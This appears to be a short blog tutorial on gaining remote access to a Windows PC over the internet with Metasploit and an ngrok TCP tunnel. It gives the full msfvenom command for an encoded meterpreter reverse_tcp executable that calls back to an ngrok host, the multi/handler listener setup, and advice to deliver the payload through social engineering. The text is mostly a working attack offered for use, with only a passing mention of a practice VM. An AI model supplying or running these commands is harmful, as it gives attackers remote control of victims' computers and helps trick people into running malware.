ReShare Remote Exploit PC On WAN ( with Ngrok )

Fire Up

Okay today i wanna share a tutorial from keingintahuan-id

TOOLS:


1. INSTALL Metasploit ( Attacker )

Metasploit is very powerfull tools, you know what ? in this tool have thousand exploit and payload for exploiting any sistem #wow, not for scannig to, in msf you can do scanning , enumerate, sniffing etc, its so usefull right ? haha 

DOWNLOAD + INSTALL

2. TARGET

for target if you have'nt target for your practical, you can download and Install VMWARE + Download ISO image for Windows targeted (Not one Network / IP public ).
   

3. Ngrok

HOW to Install NGROK


Ok Here we Go !!



 1. run Ngrok ( TCP )

ngrok tcp 4444


 2.  We must make the payload with MSFvenom

Payload Use for feed in fishing order fish bit the feed.
  
$ sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11029 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

you can change LHOST << with 0.tcp.ngrok.io
you can change LPORT << with the port in this case i use 11029
and /tmp/1.exe << you can change directory output your payload.



3. Run Msfconsole

$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


setting LHOST


set LHOST 0.0.0.0
set LPORT 4444
run 

4. Send The Payload + EXECUTE

Now u can use any way for send the payload, you can use SocialEngineering

Komentar